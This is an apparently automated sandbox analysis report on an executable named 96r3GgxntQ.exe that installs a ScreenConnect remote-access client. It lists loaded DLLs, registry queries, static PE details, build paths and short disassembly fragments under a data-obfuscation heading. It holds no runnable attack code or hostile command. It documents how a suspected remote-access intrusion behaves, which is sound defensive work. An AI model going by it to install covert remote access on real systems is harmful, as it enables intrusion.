Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 96r3GgxntQ.exe Static PE information: certificate valid
Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 96r3GgxntQ.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 96r3GgxntQ.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A06C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734370181.0000000005562000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1782306577.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1784635687.000000001B880000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1730092141.00000000008AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A068000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734596134.0000000005692000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Unpacked PE file: 11.2.ScreenConnect.ClientService.exe.5560000.0.unpack
Source: ScreenConnect.WindowsBackstageShell.exe.2.dr Static PE information: 0xBC0F508C [Tue Dec 24 14:17:48 2069 UTC]
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree, 0_2_00BB1000
Source: 96r3GgxntQ.exe Static PE information: real checksum: 0x212e6 should be: 0x1fbec
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1BC0 push ecx; ret 0_2_00BB1BD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 2_2_00007FFE7DC2D2A5 pushad ; iretd 2_2_00007FFE7DC2D2A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 2_2_00007FFE7DD48463 push eax; ret 2_2_00007FFE7DD4846D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 2_2_00007FFE7DD48452 pushad ; ret 2_2_00007FFE7DD4845D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 2_2_00007FFE7DD4B91F pushad ; ret 2_2_00007FFE7DD4B92A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 2_2_00007FFE7DD400BD pushad ; iretd 2_2_00007FFE7DD400C1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 2_2_00007FFE7DD43AD4 push 8470B948h; ret 2_2_00007FFE7DD43AD9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 2_2_00007FFE7DD4BA69 push edi; ret 2_2_00007FFE7DD4BA6A
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFE7DD57569 push ebx; iretd 10_2_00007FFE7DD5756A
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFE7DD500BD pushad ; iretd 10_2_00007FFE7DD500C1
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFE7DD57A99 push ecx; ret 10_2_00007FFE7DD57A9C
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FFE7DD800BD pushad ; iretd 13_2_00007FFE7DD800C1
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FFE7E092FA3 pushfd ; iretd 13_2_00007FFE7E092FA4
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FFE7E094832 push ss; iretd 13_2_00007FFE7E094833
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FFE7E09587E push ss; iretd 13_2_00007FFE7E095895
